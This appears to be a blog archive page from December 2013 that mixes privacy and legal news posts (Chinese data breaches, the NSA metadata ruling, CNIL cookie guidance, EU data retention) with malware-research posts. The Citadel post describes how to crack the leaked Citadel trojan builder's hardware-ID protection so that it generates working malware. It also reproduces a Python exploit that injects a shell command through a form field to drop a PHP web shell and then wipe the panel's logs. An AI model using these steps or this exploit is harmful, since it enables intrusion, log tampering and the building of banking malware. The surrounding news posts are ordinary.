Monthly Archives: December 2013

Recent Data Breach Events in China

In recent months, the Chinese government has devoted attention to the protection of personal information with, as we previously reported, the promulgation of a number of new data protection regulations. This focus is also illustrated by recent actions related to crimes involving personal information.

Gang Selling Personal Information Busted

Police apprehended a 10-member gang in Beijing and Shanghai for illegally obtaining and selling nearly one million pieces of personal information. The gang made over RMB 320,000 in illegal profits from their activity.

In mid-August of this year, a woman in Shanghai filed a complaint with the police, claiming that her personal information was improperly disclosed after she had applied for an online exam. After applying, the woman received spam messages relating to training classes in the same subject matter. Zhabei District police investigated online message platforms, and targeted an education information consulting company as the source of the spam messages. When police apprehended the owner in the Pudong New Area, he said that he had bought the personal information from an unemployed local resident, who was then apprehended in the same district. Further investigation showed that this local resident had obtained the information from a man who was responsible for maintaining a national examination application website. This person had sold the data to the local resident, who then resold them to the education company owner and a few others, including the owners of another education company and a cultural communications company.

Courier Firm Staff under Suspicion of Large-Scale Customer Data Theft

Staff at a leading Shanghai courier firm, YTO Express, are suspected of selling millions of items of personal information about its customers to online traders, who then sold the information to online retailers.

A spokesperson for YTO Express said in October 2013 that it was investigating the case and promised to crack down on the information theft. It has since been verified that the personal information sold included customer names, addresses, telephone numbers and transaction serial numbers. Armed with this information, unscrupulous online retailers can forge customer records, while other businesses can use the information to contact potential customers. Since the incident, YTO Express has reportedly taken emergency measures to reduce security risks, and has begun to conduct a comprehensive internal investigation to search for the source of the improper disclosure of personal information. YTO Express is also reportedly working with its information technology partners to enhance the security of express delivery information.

Arrest of Three Men in Illegal Sales of Millions of Items of Personal Information

An employee at a local taxation bureau in Wuhan took advantage of his position to secretly copy personal information from the local taxation bureau’s intranet onto a USB memory drive. The employee then sold the information to another person via QQ, an instant messaging software, for an illegal profit of over RMB 100,000. The purchaser then resold the information to a third person. All three men were arrested for illegally obtaining personal information.

How the protection of Citadel got cracked

Recently on a forum someone requested cbcs.exe (Citadel Backconnect Server)
If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html

I've searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside.
Finally the file wasn't on the leaked archive but was already grabbed by various malware trackers.
MD5: 50A59E805EEB228D44F6C08E4B786D1E
Malwarebytes: Backdoor.Citadel.BkCnct

And since i've downloaded the leaked Citadel package... let's see about the Builder.
It can be interesting to make a post about it.

Citadel.exe: a33fb3c7884050642202e39cd7f177e0
Malwarebytes: Hacktool.Citadel.Builder
"ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."

This file is packed with UPX:

Same for the Citadel Backconnect Server and the Hardware ID generator.
But when we try to unpack it via UPX we have an exception:

UPX told us that there is something wrong with the file header, aquabox used a lame trick.
With an hexadecimal editor we can clearly see that there is a problem with the DOS Header:

We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.
e_lfanew is null, so let's fix it at 18h by 0x40
Miracle:

Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later.
Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected

Viewing the strings already give us a good insight:
PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...

But we don't even really need to waste time trying to know how the generation is made.
Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2)
At the end, you will be here, this routine will finalise your HID:

From another side, you can also have a look on the Hardware ID Calculator.

I've got a problem with this file, the first layer was a SFX archive:

Malware embedded (stealer):


Conclusion: Don't rush on leaked stuff.

Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly.
The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it's really easy to locate it.

That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here:
And the crutial part start here.

When the Citadel package of Citab got leaked (see this article for more information) an important file was also released:

The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this:

And this is how the protection of Citadel become super weak and can generate working malwares
Now you just have to do a codecave or inject a dll in order to modify it permanently, child game.

The problem that every crackers was facing on leaked Citadel builders is to find the good HID key.
Citadel builders who was previously leaked wasn't leaked with HID key.
e.g: vortex1772_second - 1.3.5.1

And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared.
Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release.

To finish, let's get back on the Citadel backconnect server who was requested on kernelmode.info

This script was also leaked with the Citab package:


It's for Windows box, and it's super secure... oh wait..
import urllib
import urllib2

def request(url, params=None, method='GET'):
    if method == 'POST':
        urllib2.urlopen(url, urllib.urlencode(params)).read()
    elif method == 'GET':
        if params == None:
            urllib2.urlopen(url)
        else:
            urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()

def uploadShell(url, filename, payload):
    data = {
        'b'  : 'tapz',
        'p1' : 'faggot',
        'p2' : 'hacker | echo "' + payload + '" >> ' + filename
    }
    request(url + 'test.php', data)

def shellExists(url):
    return urllib.urlopen(url).getcode() == 200
   
def cleanLogs(url):
    delete = {
        'delete' : ''
    }
    request(URL + 'control.php', delete, 'POST')

URL      = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD  = '<?php phpinfo(); ?>'

uploadShell(URL, FILENAME, PAYLOAD)
print '[~] Shell created!'
if not shellExists(URL + FILENAME):
    print '[-]', FILENAME, 'not found...'
else:
    print '[+] Go to:', URL + FILENAME
cleanLogs(URL)
print '[~] Logs cleaned!'

Brief, happy new year guys :)



Episode #173: Tis the Season

Hal finds some cheer
From somewhere near the borders of scriptistan, we send you:
function t { 
for ((i=0; $i < $1; i++)); do
s=$((8-$i)); e=$((8+$i));
for ((j=0; j <= $e; j++)); do [ $j -ge $s ] && echo -n '^' || echo -n ' '; done;
echo;
done
}
function T {
for ((i=0; $i < $1; i++)); do
for ((j=0; j < 10; j++)); do [ $j -ge 7 ] && echo -n '|' || echo -n ' '; done;
echo;
done
echo
}
t 3; t 5; t 7; T 2; echo -e "Season's Greetings\n from CLKF"

Ed comes in out of the cold:

Gosh, I missed you guys.  It's nice to be home with my CLKF family for the holidays.  I brought you a present:

c:\>cmd.exe /v:on /c "echo. & echo A Christmas present for you: & color 24 & 
echo. & echo 0x0& for /L %a in (1,1,11) do @(for /L %b in (1,1,10) do @ set /a
%b%2) & echo 1"& echo. & echo Merry Christmas!

Tim awaits the new year:

Happy New Year from within the borders of Scriptistan!


Function Draw-Circle {
Param( $Radius, $XCenter, $YCenter )

for ($x = -$Radius; $x -le $Radius ; $x++) {
$y = [int]([math]::sqrt($Radius * $Radius - $x * $x))
Set-CursorLocation -X ($XCenter + $x) -Y ($YCenter + $y)
Write-Host "*" -ForegroundColor Blue -NoNewline
Set-CursorLocation -X ($XCenter + $x) -Y ($YCenter - $y)
Write-Host "*" -ForegroundColor Blue -NoNewline
}
}

Function Draw-Hat {
Param( $XCenter, $YTop, $Height, $Width, $BrimWidth )

$left = Round($XCenter - ($Width / 2))
$row = "#" * $Width
for ($y = $YTop; $y -lt $YTop + $Height - 1; $y++) {
Set-CursorLocation -X $left -Y $y
Write-Host $row -ForegroundColor Black -NoNewline
}

Set-CursorLocation -X ($left - $BrimWidth) -Y ($YTop + $Height - 1)
$row = "#" * ($Width + 2 * $BrimWidth)
Write-Host $row -ForegroundColor Black -NoNewline
}

Function Set-CursorLocation {
Param ( $x, $y )

$pos = $Host.UI.RawUI.CursorPosition
$pos.X = $x
$pos.Y = $y
$Host.UI.RawUI.CursorPosition = $pos
}

Function Round {
Param ( $int )
# Stupid banker's rounding
return [Math]::Round( $int, [MidpointRounding]'AwayFromZero' )
}

Clear-Host
Write-Host "Happy New Year!"
Draw-Circle -Radius 4 -XCenter 10 -YCenter 8
Draw-Circle -Radius 5 -XCenter 10 -YCenter 17
Draw-Circle -Radius 7 -XCenter 10 -YCenter 29
Draw-Hat -XCenter 10 -YTop 2 -Height 5 -Width 7 -BrimWidth 2
Set-CursorLocation -X 0 -Y 38

Win32/BruteForce.WP

DrWeb released a news about this malware in August, they know it as 'Trojan.WPCracker.1'
And more recently ~ 1e8cd0f0f1702820c870302520bc0176.

This executable communicate with a C&C at dorblu99.net
Let's have a closer look.

Login:

Main:

Bot info:

Broken wordpress:

Statistics:

Add domains:

Add admin panels:

Add logins:

Add passwords:

Add module for jm(zip):

Add module for wp(zip):

Add shell jm(php):

Cron brute:

Ban list:

Logs:

Domains list (downloaded by the malware to know wich wordpress he should brute force):
36k urls.

Roman of abuse.ch have also wrote an interesting post about this threat.

State Post Bureau of China Releases Draft Normative Rules Involving Personal Information Protection for Public Comment

On November 27, 2013, the State Post Bureau of the People’s Republic of China (the “SPBC”) released five draft normative rules for solicitation of public comment. Three of these rules, respectively entitled Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users (the “Draft Provisions”), Provisions on the Reporting and Handling of Security Information in the Postal Sector (the “Reporting and Handling Provisions”), and Provisions on the Management of Undeliverable Express Mail Items (the “Management Provisions”) contain significant requirements regarding the protection of personal information. The deadline for submitting comments on the rules is December 27, 2013.

Provisions on the Management of the Security of Personal Information of Postal and Delivery Service Users

The Draft Provisions were formulated in accordance with the Postal Law of the People’s Republic of China, the Measures for the Supervision and Administration of Security of the Postal Industry, and other relevant laws and regulations. The purposes of the Draft Provisions are to (1) strengthen the management of the security of users’ personal information in postal and delivery services, (2) protect the legitimate rights and interests of postal and delivery service users, (3) maintain the safety of postal correspondence and information, and (4) promote the sound development of the postal industry. The Draft Provisions apply to the supervision, administration, operation and use of postal and delivery services in China which involve the security of users’ personal information.

The Draft Provisions first define “personal information of postal and delivery service users” (the “Users’ Information”) as information used in the course of postal and delivery services. These include the name, address, ID number, telephone number and company name of the sender (and of the recipient), and the order number, delivery time and item details.

Second, the Draft Provisions set forth a number of general requirements for the protection of Users’ Information. These include:

  • Franchised express delivery enterprises must agree to clauses in the franchise agreement which establish safeguards for Users’ Information and specify security responsibilities of the franchisee and franchisor. When a franchisor incurs an information security incident, the franchisee must be required to undertake responsibilities of its own for the incident response;
  • A postal or express delivery enterprise must sign a confidentiality agreement with its operational staff to clarify confidentiality obligations in relation to Users’ Information, and must provide continuing training and education to develop the knowledge and skills of its operational staff with respect to the security of Users’ Information;
  • A postal or express delivery enterprise must establish a mechanism for handling complaints relating to the security of Users’ Information;
  • Whenever a postal or express delivery enterprise is engaged by operators (such as e-commerce operators and TV shopping operators) to provide delivery services, the agreement between the parties must include security clauses for the protection of Users’ Information, which specify the scope of information use, security protection measures for information exchanges and allocation of responsibilities in the event of information security incidents;
  • When entrusting a third party to input Users’ Information, a postal or express delivery enterprise must ensure that the third party is qualified to undertake information security safeguards, and must bear responsibility for information security incidents caused by the third party; and
  • No postal or express delivery enterprise, or operational staff thereof, may transfer any Users’ Information to any third party without express authorization under law, or without the users’ written consent.

Third, in addition to the foregoing requirements above, postal or express delivery enterprises are required to strengthen the management of the security of physical and electronic information appearing on the waybill, for example:

  • A postal or express delivery enterprise must strengthen the management of its business and processing locations and physically isolate the user service area from the mail (or express mail) processing and storage sites. To prevent the physical information from being stolen or leaked, non-staff must be strictly forbidden from entering such sites or reading over mail items (or express mails).
  • To prevent malicious code from destroying information systems and networks, and to avoid disclosure or alteration of information, postal and express delivery enterprises must install necessary antivirus software and hardware, set up measures to encrypt the delivery of Users’ Information through public networks, and strengthen their management of system passwords and of the security of electronic Users’ Information storage.

Finally, violations of the Draft Provisions may result in penalties including administrative warnings, fines and (under certain circumstances) even criminal liability.

Provisions on the Reporting and Handling of Security Information in the Postal Sector

The Reporting and Handling Provisions define “security information which should be reported and handled” as emergency and operational information relating to the security of the daily processes of postal or express delivery enterprises. The Reporting and Handling Provisions apply to the reporting and handling of this security information by postal or express delivery enterprises, or by postal administration authorities.

Under the Reporting and Handling Provisions, when Users’ Information has been illegally disclosed, postal or express delivery enterprises are required to report security information without delay to their local postal administration authorities and public security departments. If more than 500 items of Users’ Information have been illegally disclosed, local authorities must report the incident to the provincial postal administration authorities within two hours after they receive the report.

Provisions on the Management of Undeliverable Express Mail Items

The Management Provisions are intended to promote the freedom and privacy of correspondence and to protect the legitimate rights and interests of express delivery clients and their correspondents. The Management Provisions emphasize that, at times when undeliverable express items are held in custody and are being processed, no express delivery information may be misappropriated or illegally provided to others.

Conclusion

The three draft rules contain specific provisions on the protection of personal information in the postal industry. Once promulgated, the rules will have nationwide effect. The promulgation of these rules will likely alleviate problems arising from the misappropriation of personal information that is used in postal and express delivery services. In light of the emergence of markets that trade in personal information in a variety of fields, however, imposing regulations on the handling of personal information solely in the postal sector is insufficient and regulation of other sectors where opportunities to sell personal information is needed. Until an integrated, national Personal Data Protection Act that governs the handling of data protection in all industry sectors is adopted, markets for trading in personal information in China are likely to persist.

Read our previous coverage on Chinese personal information protection issues.

Federal District Judge Ruling Casts Cloud Over NSA Data Collection

On December 16, 2013, the United States District Court for the District of Columbia granted a preliminary injunction barring the federal government from collecting and analyzing metadata related to two consumers’ mobile phone accounts. The court held that the two individual plaintiffs were entitled to a preliminary injunction because they had standing to challenge the government’s data collection practices and were substantially likely to succeed on the merits of their claim. The court has stayed issuance of the injunction pending appeal to the D.C. Circuit Court.

The court’s opinion states that the federal government, through the National Security Agency (“NSA”), issued a production letter to the plaintiffs’ wireless provider requesting that the provider disclose vast quantities of consumer phone records indiscriminately, regardless of any suspicion of wrongdoing. The consumer phone records obtained by the NSA contained metadata, such as the phone numbers of outgoing and incoming calls to an individual’s account. According to the decision, the NSA (1) has collected bulk telephony metadata from multiple telecommunications providers for more than seven years, (2) has combined the metadata from the various telecommunications providers into one database, and (3) conducts sophisticated computerized searches of the metadata. The combined database is enormous, and it is updated daily. The court indicated that, based on the government’s description of its collection and review procedures, he was convinced that “everyone’s metadata” is analyzed.

Among other allegations, the plaintiffs charged that the NSA’s data collection practices constitute unreasonable searches and seizures that violate the Fourth Amendment. The court held that plaintiffs had standing to challenge the NSA’s data collection because they could point to “strong evidence” that their telephony metadata was collected and will continue to be collected. In granting the preliminary injunction, the court found that the plaintiffs were substantially likely to succeed on the merits of their claim because it is “significantly likely” that a person’s reasonable expectation of privacy is violated when the “[g]overnment, without any basis whatsoever to suspect [him or her] of wrongdoing, collects and stores for five years their telephony metadata for purposes of subjecting it to high-tech querying and analysis without any case-by-case judicial approval.”

White House Publishes Report on Government Surveillance Programs

On December 18, 2013, the White House published a report recommending reforms to the federal government’s wide-ranging surveillance programs. The voluminous report, entitled “Liberty and Security in a Changing World,” was authored by The Review Group on Intelligence and Communications Technologies, an advisory panel that includes experts in national security, intelligence gathering and civil liberties.

The report begins by describing the varying goals of U.S. surveillance efforts, which range from defending national security to protecting the right to privacy to strengthening strategic alliances with other countries. The report then details 46 recommendations designed to balance these goals. Some notable recommendations include:

  • Establishing a general rule that the federal government should not collect and store “mass, undigested, non-public personal information about individuals to enable future queries and data-mining for foreign intelligence purposes”;
  • Increasing the transparency of the Foreign Intelligence Surveillance Court;
  • Applying the Privacy Act of 1974, which regulates the use and disclosure of personally identifiable information by federal agencies to “both US persons and non-US persons”;
  • Increasing the use of encryption and urging U.S. companies to encrypt data in transit, at rest and in storage (including in the cloud); and
  • Creating a Civil Liberties and Privacy Protection Board to “oversee Intelligence Community activities for foreign intelligence purposes, rather than only for counterterrorism purposes.”

The report concludes by noting the rapid pace of technological development and emphasizing that the reforms advocated in the report are intended to “safeguard the privacy and dignity of American citizens, and to promote public trust, while also allowing the Intelligence Community to do what must be done to respond to genuine threats.”

Read the full report.

French Data Protection Authority Issues Guidance on Cookie Consent and Expiration

On December 16, 2013, the French Data Protection Authority (“CNIL”) released a set of practical FAQs (plus technical tools and relevant source code) providing guidance on how to obtain consent for the use of cookies and similar technologies in compliance with EU and French data protection requirements (the “CNIL’s Guidance”). Article 5.3 of the revised e-Privacy Directive 2002/58/EC imposes an obligation to obtain prior consent before placing or accessing cookies and similar technologies on web users’ devices. Article 32-II of the French Data Protection Act transposes this obligation into French law.

The CNIL’s Guidance indicates that this obligation applies to website publishers, operating system and application publishers, advertising networks, social networks and website analytics solutions providers.

The CNIL’s Guidance also states that only certain cookies are exempt from the consent requirement under French data protection law, namely cookies whose sole purpose is to enable or facilitate electronic communications or that are strictly necessary for the provision of an online communication service as expressly requested by the user. According to the CNIL’s Guidance, this includes:

  • cookies used for a “shopping basket” on a merchant’s website;
  • “Session ID” cookies for the duration of the session (or persistent cookies limited to a few hours in some cases);
  • authentication cookies;
  • multimedia player session cookies;
  • load balancing session cookies; and
  • persistent user interface customization cookies.

Some web analytics solutions also may qualify for an exemption from the consent requirement.

In all other cases, the CNIL’s Guidance emphasizes that:

  • web users’ consent must be obtained before placing or reading cookies and similar technologies (such as web bugs and fingerprinting technologies), and such consent must be obtained each time these technologies are used for a new purpose;
  • the validity of the consent is linked to the quality of the information provided to web users – in particular, web users must be clearly informed of the different purposes for which the cookies and similar technologies will be used; and
  • web users’ consent is valid only if the users have a real choice between accepting or refusing cookies and similar technologies.

In practice, the CNIL recommends obtaining consent using a two-pronged approach, as described below.

Step 1: Provide Information to the Web User About the Cookies and Their Purposes 

According to the CNIL’s Guidance, a banner must appear on the home page or on a subpage of the website when a user visits it. The banner must specify:

  • the exact purposes of the cookies used on the website; and
  • the fact that, by continuing to use the website, the user accepts the use of cookies.

The banner must also include a link to another page (“For more information”) that explains how to change cookie settings and accept or refuse cookies. The CNIL’s Guidance includes a template banner and specifies that such a banner must remain until the user interacts with the website. If the user does not continue to use the website, this absence of action cannot be interpreted as the user’s consent to the use of cookies.

Step 2: The “More Information” Page

According to the CNIL’s Guidance, when a user clicks on the “For more information” link provided in the banner, the user must be directed to information about how to accept or refuse cookies. This may be presented as:

  • a cookie consent mechanism directly available on the website or application;
  • a link to opt-out solutions offered by advertising networks, social networks and website analytics solutions providers, (assuming that these solutions are user-friendly and functional); or
  • under certain circumstances, details on how to modify browser settings to accept or refuse cookies.

Cookie Expiration

The CNIL’s Guidance recommends that a user’s cookie consent may be considered valid for up to 13 months. After this period, the website must get renewed consent from the user. The CNIL’s Guidance states that cookies should be programmed to expire 13 months after they are placed on a user’s device.

Advanced Malware Analysis Training Session 11 – (Part 2) Dissecting the HeartBeat RAT Functionalities

Here is the quick update on this month’s Local Security meet (SX/Null/G4H/owasp) and our advanced malware training session on (Part 2) Dissecting the HeartBeat  RAT Functionalities   This is part of our FREE ‘Advanced Malware Analysis Training’ series started from Dec 2012.       In this extended session, I explained “Decrypting various Communications Of HeartBeat […]

State “Ban the Box” Legislation Gains Momentum

As reported in the Hunton Employment & Labor Perspectives Blog, the “ban the box” movement continues to sweep through state legislatures. “Ban the box” laws, which vary in terms of scope and detail, generally prohibit employers from requesting information about job applicants’ criminal histories. Recent legislation in two states applies “ban the box” prohibitions to private employers in those states:

  • On December 1, 2013, a new North Carolina law went into effect that prohibits employers from inquiring about job applicants’ arrests, charges or convictions that have been expunged. This prohibition applies to requests for information on applications and during interviews with applicants.
  • On January 1, 2014, a new Minnesota law goes into effect that prohibits employers from inquiring into, requiring disclosure of or considering the criminal record or criminal history of an applicant until the applicant has been selected for an interview or, if there is no interview, until after a conditional offer of employment has been made.

Employers should review their applications and hiring practices to ensure compliance with the new laws, and verify that managers involved in the hiring process understand when, and to what extent, they are permitted to inquire about applicants’ criminal histories.

Read the full post on the Hunton Employment & Labor Blog.

Data, data everywhere! Where it comes from, nobody really knows?

While there are still a few weeks left in 2013, it has already been the most severe in terms of data breaches in the last 10 years with over 705 million records lost. In addition, 4 of the top 10 data breaches of all time happened in 2013, with the top spot now belonging to Adobe (at least for the moment).

The Adobe breach was discovered and brought to light by Brian Krebs and information security researcher Alex Holden back in October (Brian Krebs is an Advisor to Alex Holden’s company). When the leak was first announced it was said to be about 2.9 million records but soon after the figure changed to what is now confirmed to be approximately 152 million records. Adobe has commented on the amount of data and users impacted a few times, and is expected to provide an update when their investigations are completed. The data has been stated to have a lot of duplicates as well as false data including usernames (email addresses) and encrypted passwords. This data was allegedly obtained directly from Adobe’s servers by unknown hackers who are also said to have obtained data from several other well known sites as well.

Early investigations by Krebs appear to have uncovered major breaches after they obtained the complete database of SSNDOB, an underground carding and personal information website. The SSNDOB investigation uncovered a lot of high profile names like LexisNexis Inc., Dun & Bradstreet, and Kroll Background America, Inc. all of which were hacked and used as a massive database for the SSNDOB website. In addition, another was the Cupid Media breach which exposed 42 million accounts and according to Brian Krebs was found on the same server as the Adobe data as well as NW3CM and PR News Wire.

One item which does not seem to be fully addressed is how Brian Krebs and Alex Holden were able to obtain this data. In one of the posts, there was a mention that they“discovered a massive 40 GB source code trove stashed on a server” but still their methods were not abundantly clear. There are several deep web monitoring services available and we have confirmed that at some point the Adobe data was available for purchase for a whopping $6 dollars. However, speculation in some circles have been that this data was originally acquired from a private server and therefore to obtain the data they would have had to have illicit access to the server themselves.

Regardless of the method used to obtain the data, at this point what they have done is help to raise the awareness of several massive breaches that have impacted millions of people around the world. As we move forward, was this type of discovery a one off or will we see more data breach disclosure in this fashion?

Interview with Champ Clark – Episode 356, Part 1 – December 12, 2013

Champ Clark, also know as "Da Beave" in some circles, is the CTO of Quadrant Information Security headquartered in Jacksonville, Florida. He is one of the founding members of the VoIP hacking group Telephreakand runs the Deathrow OpenVMS cluster. He has co-authored books published by Syngress Publishing and has been interviewed by various magazines. He has spoken at conferences on topics such as "war dialing" the world with VoIP, exploring X.25 networks around the world, and most recently, real time log analysis with "Sagan", software he developed.

EU Court of Justice Advocate-General Finds Data Retention Directive Incompatible with Charter of Fundamental Rights

On December 12, 2013, Advocate-General Cruz Villalón of the European Court of Justice (“ECJ”) issued his Opinion on the compatibility of the EU Data Retention Directive 2006/24/EC (the “Data Retention Directive”) with the Charter of Fundamental Rights of the European Union (the “EU Charter”).

Background
The Data Retention Directive requires EU Member States to ensure that telecommunications service providers collect and retain traffic and location data (but not the substantive content of those communications) for purposes of investigating, detecting and prosecuting serious crimes as defined by national law. The data must be retained for a minimum of six months and a maximum of two years.

The Advocate-General delivered his Opinion in connection with four national cases, one brought by Digital Rights Ireland against the Irish authorities and three cases pending before Austria’s constitutional court.

Opinion of the Advocate-General
In his Opinion, the Advocate-General considered that the collection and the retention, in large databases, of these data constitute a serious interference with the right to privacy contained in the EU Charter. The Advocate-General emphasized that the data could be used to reconstruct a large portion of a person’s conduct, or even a complete and accurate picture of his or her private identity. According to the Advocate-General, the risk that the data might be used for unlawful purposes is increased by the following factors:

  • the data are not retained by national public authorities, or even under their direct control, but by the telecommunications service providers; and
  • the data may be stored at indeterminate locations in cyberspace since the Data Retention Directive does not require the data to be stored in the territory of a EU Member State.

In the light of this serious interference with the right to privacy, the Advocate-General ruled that the Data Retention Directive should have defined the necessary principles for governing the guarantees needed to regulate access to the data and their use, instead of assigning the task of defining and establishing those guarantees to the EU Member States. The Advocate-General concluded that the Data Retention Directive does not comply with the requirement, laid down by the EU Charter, that any limitation on the exercise of a fundamental right must be provided for by law.

Further, the Advocate-General found no reason why the Data Retention Directive requires EU Member States to ensure that the data are retained for a maximum of two years instead of limiting the retention period to less than one year.

In the Opinion, the Advocate-General proposes to suspend the effects of a finding that the Data Retention Directive is invalid in order to enable the EU legislature to adopt, within a reasonable time period, the measures necessary to remedy the invalidity.

Fred Cate of the Centre Submits Comments to NIST on Preliminary Cybersecurity Framework

On December 12, 2013, Fred H. Cate, Senior Policy Advisor in the Centre for Information Policy Leadership at Hunton & Williams LLP (the “Centre”), submitted comments in response to the National Institute of Standards and Technology’s (“NIST’s”) Preliminary Cybersecurity Framework (the “Preliminary Framework”). On October 22, NIST issued the Preliminary Framework, as required by the Obama Administration’s February 2013 executive order, Improving Critical Infrastructure Cybersecurity (“Executive Order”), and solicited comments on the Framework. The Preliminary Framework includes standards, methodologies, procedures and processes that align policy, business and technological approaches to address cyber risks.

The comments criticized the Methodology to Protect Privacy and Civil Liberties, which appears as Appendix B to the framework, as being unlikely to advance either privacy or security.

The primary reason for the criticism is the fact that the proposed privacy methodology is completely distinct both from the Preliminary Cybersecurity Framework itself and from the wide range of successful privacy and data protection programs already implemented by industry leaders.

Commenters also note that the considerable breadth of Appendix B magnifies the concern over the inconsistency of Appendix B. Appendix B does not appear to be limited to security-related activities to start with, and, even when applied to those activities, it raises the prospect of privacy and civil liberties issues being evaluated where experience shows they are unlikely to exist. Moreover, the inclusion of “civil liberties” issues, which historically have applied only in the context of government activities, in a framework that primarily targets the private sector is not only overly broad, but potentially specious. In addition, a number of the requirements of Appendix B go far beyond existing U.S. privacy law.

According to the comments, the proposed methodology also is troubling because of the claim in its introductory text suggesting that it is “based on the Fair Information Practice Principles (FIPPs) referenced in the Executive Order.” FIPPs, such as notice and choice, are a poor basis for addressing most cybersecurity privacy issues. The FIPPs also are being increasingly challenged, precisely because of their often-poor fit in contexts such as Big Data, ubiquitous surveillance and cybersecurity.

The reference to the Executive Order also is misleading since FIPPs are addressed in Section 5 of the Executive Order, which deals with the conduct of government agencies, not industry (and even there are referenced along with “other privacy and civil liberties policies, principles, and frameworks as they apply to each agency’s activities”). FIPPS are not addressed in the context of the privacy methodology in Section 7.

To address these concerns, Cate recommends the following:

  • Eliminate Appendix B and move privacy protection into Appendix A, so that the protection of privacy is clearly integrated with cybersecurity.
  • Make explicit that the privacy protections apply only in the context of information assurance activities.
  • Limit the privacy methodology, wherever it appears, to objectives and principles, rather than specific tasks. In addition, limit the methodology to privacy—not other civil liberties—or if the protection of other civil liberties is to be included, clarify that this responsibility can apply only to government entities.
  • Eliminate any reference to FIPPs.
  • Focus instead on more relevant principles of “accountability” and “stewardship” of personal data, such as the work the Centre has been leading in recent years.
  • Do not assume that all, or even most, information assurance activities will raise privacy issues, and do not impose significant burdens on industry to restrict sharing cyber threat information with the government that might contain personally identifiable information if the government already has access to the data.

Under the Executive Order, NIST is required to issue a final version of the Framework in February 2014.

Hunton Publishes Final Paper in its Series of Executive Briefings on the Proposed EU Data Protection Regulation

As we previously reported, on October 21, 2013, the European Parliament approved its Compromise Text of the proposed EU General Data Protection Regulation (the “Proposed Regulation”). Hunton & Williams has now published an analysis of these proposals.

This latest analysis is the last installment in our series of Executive Briefings on the Proposed Regulation. Since the publication of the Proposed Regulation in January 2012, Hunton & Williams has been tracking developments and analyzing each stage of the legislative process:

  • Our initial Executive Briefing Paper examines the European Commission’s proposals, how the proposals would revise the existing EU data protection framework, and how those changes would likely impact organizations in practice.
  • In January 2013, following the publication of the draft report on the Proposed Regulation of the European Parliament’s lead rapporteur, we published an update to the Executive Briefing Paper, analyzing the rapporteur’s draft amendments to the European Commission’s proposals.
  • In June 2013, we published a second update to the Executive Briefing Paper examining in detail the Irish Presidency’s proposed amendments to the Proposed Regulation; specifically, the Presidency’s proposals regarding consent, legitimate grounds for processing, pseudonymization, data minimization, profiling and the right to be forgotten.
  • Our latest analysis, the final update in the series, examines the European Parliament’s Final Compromise Text, adopted on October 21, 2013.

Next up, the Council of Ministers must reach an agreement on the Proposed Regulation, after which a “trilogue” between the Parliament, the Council and the Commission will be established to work on the final text. A vote is expected before the parliamentary elections in May 2014. The coming months are likely to involve a period of intense negotiations, and businesses should remain engaged in the process.

Hunton & Williams is developing additional materials regarding the next steps in the legislative process to offer practical insights to our clients.

People’s Bank of China Issues Administrative Measures for Credit Reference Agencies

On November 15, 2013, the People’s Bank of China (the “PBOC”) issued its Administrative Measures for Credit Reference Agencies (the “Measures”) – eight months after the Administrative Regulations on the Credit Information Collection Sector (the “Regulations”) became effective on March 15, 2013. The Measures, which will take effect on December 20, 2013, were formulated to enhance the supervision and regulation of credit reference agencies and to promote positive developments in the credit information services sector.

The Measures are intended to complement the Regulations, which established a series of rules for the collection, use, processing, disclosure and transfer of personal information by credit reference agencies. The Measures provide more detail, by clarifying and specifying rules for the establishment of credit reference agencies that deal with the personal credit information of individuals (“personal credit reference agencies”). The Measures require a personal credit reference agency to first apply for pre-approval for a License for Personal Credit Reference Business from the PBOC before the agency may incorporate. In contrast, credit reference agencies that deal with enterprises’ credit information may be incorporated first, and then file with the relevant local PBOC counterpart. The Measures also require the personal credit reference agency to comply with a set of technical information security standards with respect to their credit reference business, and undergo regular assessments by a third-party institution that is qualified to assess information security safeguards.

Also pursuant to the Measures, a credit reference agency may be subject to enhanced surveillance by the PBOC (or its local counterpart) under certain circumstances, such as when the agency (1) is involved in a serious data breach incident, (2) shows signs of a possible data leakage, (3) is having major financial difficulties, (4) has been the subject of numerous complaints, or (5) has failed to comply with its reporting and appraisal obligations.

The implementation of these detailed rules for establishing and running personal credit reference agencies (and other compliance requirements) offer yet another example of increased attention to personal information protection issues by the Chinese government.

Read our previous coverage on Chinese personal information protection issues, including our post on the Supreme People’s Court of China passing of the Provisions on the Online Issuance of Judgment Documents by People’s Courts.

FTC Announces Seminars on Mobile Device Tracking, Predictive Scoring and Consumer-Generated Health Data

On December 2, 2013, the Federal Trade Commission announced that it will host a series of seminars to examine the privacy implications of three new areas of technology used to track, market to and analyze consumers: mobile device tracking, predictive scoring and consumer-generated health data. The seminars will address (1) businesses tracking consumers using signals from the consumers’ mobile devices, (2) the use of predictive scoring to determine consumers’ access to products and offers, and (3) consumer-generated information provided to non-HIPAA covered websites and apps. The FTC stated that the intention of the seminars is to bring attention to new trends in big data and their impact on consumer privacy.

In 2011, Senator Chuck Schumer (D-NY) urged companies to obtain opt-in consent from consumers before engaging in mobile device tracking and asked the FTC to examine the issue. In March 2013, Senator Al Franken (D-MN) asked one tracking company to explain how it collects and uses data from consumers. The FTC’s seminar will address the potential benefits of mobile device tracking to consumers, whether mobile device tracking is anonymous, and how companies can implement privacy by design, including notifying consumers and allowing them to choose whether or not to be tracked.

